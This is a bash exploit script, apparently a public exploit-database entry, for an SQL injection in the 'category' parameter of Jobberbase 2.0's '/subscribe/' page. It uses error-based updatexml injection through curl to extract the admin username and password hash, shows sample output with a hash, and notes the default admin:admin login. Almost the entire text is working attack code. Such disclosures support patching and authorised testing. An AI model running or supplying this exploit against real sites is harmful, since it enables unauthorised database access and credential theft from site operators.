Share
#!/bin/bash  
# Exploit Title: Jobberbase 2.0 - 'subscribe' SQL injection  
# Date: 29 August 2019  
# Exploit Author: Damian Ebelties (https://zerodays.lol/)  
# Vendor Homepage: http://www.jobberbase.com/  
# Version: 2.0  
# Tested on: Ubuntu 18.04.1  
  
: '  
  
The page "/subscribe/" is vulnerable for SQL injection.  
  
Simply make a POST request to /subscribe/ with the parameters:  
- email=jobber@zerodays.lol  
- category=1337<inject_here>  
  
You can use this script to verify if YOUR OWN instance is vulnerable.  
  
$ bash verify.sh http://localhost/jobberbase/  
admin:1a1dc91c907325c69271ddf0c944bc72  
  
'  
  
: 'Fetch the username'  
USERNAME=$(curl -s "$1/subscribe/" \  
-d "email=jobber@zerodays.lol" \  
-d "category=-1337 and updatexml(0,concat(0x0a,(select username from admin limit 0,1),0x0a),0)-- -" \  
-d "zero=days.lol" | head -n 3 | tail -n 1 | sed "s/'' in.*//")  
  
: 'Ugly way to fetch the password hash'  
PASS=$(curl -s "$1/subscribe/" \  
-d "email=jobber@zerodays.lol" \  
-d "category=-1337 and updatexml(0,concat(0x0a,(select substring(password,1,16) from admin limit 0,1),0x0a),0)-- -" \  
-d "zero=days.lol" | head -n 3 | tail -n 1 | sed "s/'' in.*//")  
WORD=$(curl -s "$1/subscribe/" \  
-d "email=jobber@zerodays.lol" \  
-d "category=-1337 and updatexml(0,concat(0x0a,(select substring(password,17,16) from admin limit 0,1),0x0a),0)-- -" \  
-d "zero=days.lol" | head -n 3 | tail -n 1 | sed "s/'' in.*//")  
  
: 'Print the user:hash (note: default login is admin:admin)'  
echo -e "$USERNAME:$PASS$WORD"